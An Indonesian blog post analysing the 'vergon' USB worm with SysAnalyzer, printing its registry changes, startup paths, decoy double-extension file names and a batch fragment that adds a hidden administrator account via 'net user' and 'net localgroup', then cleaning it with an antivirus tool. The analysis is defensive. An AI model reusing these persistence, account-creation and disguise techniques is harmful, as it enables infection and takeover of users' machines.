Analisa malware dengan SysAnalyzer

Kemarin, ketika saya meminjam flashdisk teman, saya menemukan sebuah file yang tersembunyi dan berekstensi ganda (.mpg.exe). Karenanya saya mencurigainya sebagai malware (virus dkk). Berbekal worm ini, saya mencoba sedikit belajar menganalisa sebuah file worm. Aplikasi yang saya pakai adalah SysAnalizer .

Dengan percaya diri, saya mulai mencoba file worm tersebut dengan menggunakan SysAnalizer. Dan,………boooooooom. Komputer saya langsung terinfeksi worm ini. Hasil dari analisanya SysAnalizer terhadap worm ini adalah sebagai berikut (beberapa bagian saya hapus biar tidak terlalu panjang):

—————————————————————————————————
File: vergon1885.exe
Size: 143872 Bytes
MD5: DAD2486C034050D73F7178F2A243AC6E
Packer: File not found C:iDefenseSysAnalyzerpeid.exeFile Properties: CompanyName
FileDescription
FileVersion 1.01.2007
InternalName vergon
LegalCopyright Makassar – Indonesia
OriginalFilename vergon.exe
ProductName vergon
ProductVersion

Exploit Signatures:
—————————————————————————
Scanning for 19 signatures
Scan Complete: 220Kb in 0,016 seconds
Urls
————————————————–



RegKeys
————————————————–
1. HENTIKAN PEMBAJAKAN APAPUN(LAGU(MP3), SOFTWARE, FILM, dll)!
SoftwareMicrosoftWindowsCurrentVersionRun
SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
SoftwareMicrosoftcommand processor
SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorercabinetstatefullpath
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorercabinetstatefullpathaddress
HKLMSoftwareMicrosoftWindowsCurrentVersionSystemFileProtectionShowPopupsExeRefs
————————————————–
File: vergon1885_dmp.exe_
vergon1885.exe
systemx-executor.exe
.exe
start %windir%systemx-executor.exe
C:Program FilesWindows Media Playerwmplayer.exe c:windowssystemLagu.mp3
C:Documents and SettingsAdministratorStart MenuProgramsStartupadmin32.exe
C:Documents and SettingsDefault UserStart MenuProgramsStartup_default.exe
C:Documents and SettingsAll UsersStart MenuProgramsStartupuser32.exe
Explorer.exe
userinit.exe,
C:BackupWMP_10 for XP.exe
D:DocIEWMP_10_xpsp2.exe
D:SecretABG_xxx.3gp.exe
D:ToolsAVSEQ01.mpg.exe
E:playerWMP_10.4.exe
E:XXX1-1-2007.mpg.exe
E:multimediaLagu porno.mp3.exe
F:favoriteSamson – Lelaki buaya darat.mp3.exe
F:SongRia Amelia – SMS.mp3.exe
F:playlistplaystuff.mpg.exe
G:New FolderPlug-in WMP_10.XPSP2.exe
G:newDFX for Windows Media Player.XPSP2.exe
G:downloadsexmission.mpg.exe
h:mp3Top Indo 2007.MP3.exe
h:videosecretvideo.mpg.exe
h:My Filehe he he.mpg.exe
h:mp3Top Indo 2007.mp3.exe
I:Hiddenprivate.mpg.exe
I:sembunyi3movie1107.mpg.exe
I:My folderfilmbiru.mpg.exe
zuma.exe
vergon.exe

Raw Strings:
————————————————–
File: vergon1885_dmp.exe_
MD5: 6accf1d800270c3a709e45d0300568fb
Size: 225282

Ascii Strings:
—————————————————————————
!This program cannot be run in DOS mode.
Rich
.text
PEC2
`.rsrc

……….

Unicode Strings:
—————————————————————————
ZAaAoA
A*AC:Documents and SettingsmeMy Documentsproject1vergonvergon.bvergon.B.vbp
vergon1885.exe
systemx-executor.exe
H I M B A U A N !
1. HENTIKAN PEMBAJAKAN APAPUN(LAGU(MP3), SOFTWARE, FILM, dll)!
2. STOP PORNOGRAFI, PORNSTUFF DAN PORNOAKSI!
3. MARILAH KITA BEREMPATI,MEMBANTU DAN MENDOAKAN SAUDARA KITA
YANG TERKENA MUSIBAH DI NEGERI INI…
By Vergon
Makassar – Indonesia
ben_owie@yahoo.co.id
VERGON MESSAGE
09:00:00
update
09:00:15
09:02:30
19:00:00
19:00:15
19:02:30
task
process exp
policy
hijack
girl
x-ray
iknow
regedit
basmi
kill
restore
repair
sintax
jalan
project
security
registry
tweak
clean
tugas
scan
remov
wav.
automa
curr
sysinter
.exe
man.bat
@echo off
echo. ________ oooo ooo _____________________________________________________
echo. :******* ooo oo ****************************************************:
echo. :******* ooo oo ooooo oo oooo ooooo ooooo oo ooo ********:
echo. :******* ooo oo ooo oo ooo oo ooo oo ooo oo ooo oo *******:
net user Vergon x-executor /add
echo. :******* oo o ooooooo ooo ooo oo ooo oo ooo oo *******:
echo. :******** ooo ooo ooo ooo oo ooo oo ooo oo *******:
echo. ben_owie@yahoo.co.id
set x=
echo. :********* o ooooo ooo oooooo ooooo ooo oo *******:
echo. :********** oo *******:
echo. -:******* your.. *******:-
echo. -:****** command *******:-
echo. :**************************************** oo **************************:
echo. ooooo
echo. -:******* Vergon *******:-
echo. -:******* hack.. *******:-
net localgroup %x%administrators%x% vergon /add
start %windir%systemx-executor.exe
C:Program FilesWindows Media Playerwmplayer.exe c:windowssystemLagu.mp3
c:windowssystem
Lagu.mp3
C:Documents and SettingsAdministratorStart MenuProgramsStartupadmin32.exe
C:Documents and SettingsDefault UserStart MenuProgramsStartup_default.exe
C:Documents and SettingsAll UsersStart MenuProgramsStartupuser32.exe
SoftwareMicrosoftWindowsCurrentVersionRun
wmplayer
SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Shell
Explorer.exe
Userinit
userinit.exe,
SYSTEMControlSet001ControlSafeBoot
AlternateShell
SYSTEMCurrentControlSetControlSafeBoot
exefile
Winamp media file
SoftwareMicrosoftcommand processor
autorun
SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem
DisableRegedit
DisableRegistryTools
DisableTaskMgr
msvbvm60.dll
c:msvbvm60.dll
SystemSYSVER.DLL
C:BackupWMP_10 for XP.exe
C:Backup
D:DocIEWMP_10_xpsp2.exe
D:Secret
D:SecretABG_xxx.3gp.exe
D:Tools
D:ToolsAVSEQ01.mpg.exe
D:Doc
E:playerWMP_10.4.exe
E:XXX
E:Multimedia
E:Player
E:XXX1-1-2007.mpg.exe
E:multimediaLagu porno.mp3.exe
E:multimedia
F:favoriteSamson – Lelaki buaya darat.mp3.exe
F:Song
F:Playlist
F:Favorite
F:SongRia Amelia – SMS.mp3.exe
F:playlistplaystuff.mpg.exe
F:playlist
G:New FolderPlug-in WMP_10.XPSP2.exe
G:New Folder
G:New
G:download
G:newDFX for Windows Media Player.XPSP2.exe
G:downloadsexmission.mpg.exe
G:new
h:mp3Top Indo 2007.MP3.exe
H:Video
H:My File
H:mp3
h:videosecretvideo.mpg.exe
h:My Filehe he he.mpg.exe
G:My File
G:Video
h:mp3Top Indo 2007.mp3.exe
I:Hiddenprivate.mpg.exe
I:Hidden
I:sembunyi
I:My folder
I:sembunyi3movie1107.mpg.exe
I:My folderfilmbiru.mpg.exe
LAGU
winamp
play
audio
*sex*
*x*.midi
*x*.rm
*x*.mid
*x*.3gp
*.mp3
*x*.mp4
*x*.mpg
*x*.mpeg
*.m3u
*x*.avi
avseq*.dat
*x*.wma
*x*.wav
*x*.wmv
*x*.amv
*porn*
*girl*
*adult*
*playlist*
*hot*
zuma.exe
*x*.jpg
*x*.jpeg
*x*.bmp
*x*.gif
Fixed Drive
Removable Drive
Remote Drive
CD-ROM
RAM Disk
Drive Doesn’t Exist
wscript.shell
RegWrite
REG_DWORD
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden
model
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorercabinetstatefullpath
HKCUSoftwareMicrosoftWindowsCurrentVersionExplorercabinetstatefullpathaddress
HKLMSoftwareMicrosoftWindowsCurrentVersionSystemFileProtectionShowPopups
adult
nude
porn
system
startup
Playboy
lalat
search
17tahun
america
oral
naked
kamas
ExploreWClass
WorkerA
WorkerW
ReBarWindow32
ComboBoxEx32
ComboBox
Edit
IEFrame
Navigation Bar
Address Band Root
@*AC:Documents and SettingsmeMy Documentsproject1vergonvergon.bvergon.B.vbp
LAGU

——————————————————————————————————————-
Dari hasil program di atas, kita dapat mengetahui beberapa registry yang diubah worm vergon, file-file yang dibuat dan lain-lain sehingga kita bisa menghapus worm ini serta memperbaiki setting registry. Setelah tahu berbagai hal tentang worm vergon, langkah selanjutnya adalah membersihkan worm ini. Daripada repot membersihkan secara manual, saya menggunakan Ansav 1.5.9 untuk membersihkannya.

Catatan: Sebaiknya baca petunjuk penggunaan program ini sebelum menggunakan dan jalankan program ini melalui Windows virtual (memakai VMWare atau Virtual PC) agar komputer tidak terinfeksi.

3 thoughts on “Analisa malware dengan SysAnalyzer”

  1. Walah… panjang dan rumit…
    Jadi bagaimana dengan nasib hanya user tanpa pengetahuan tentang program-program rumit-rumit itu… 🙁

    Bagaimana tahu ada file extensi ganda?.

Leave a Reply

Your email address will not be published. Required fields are marked *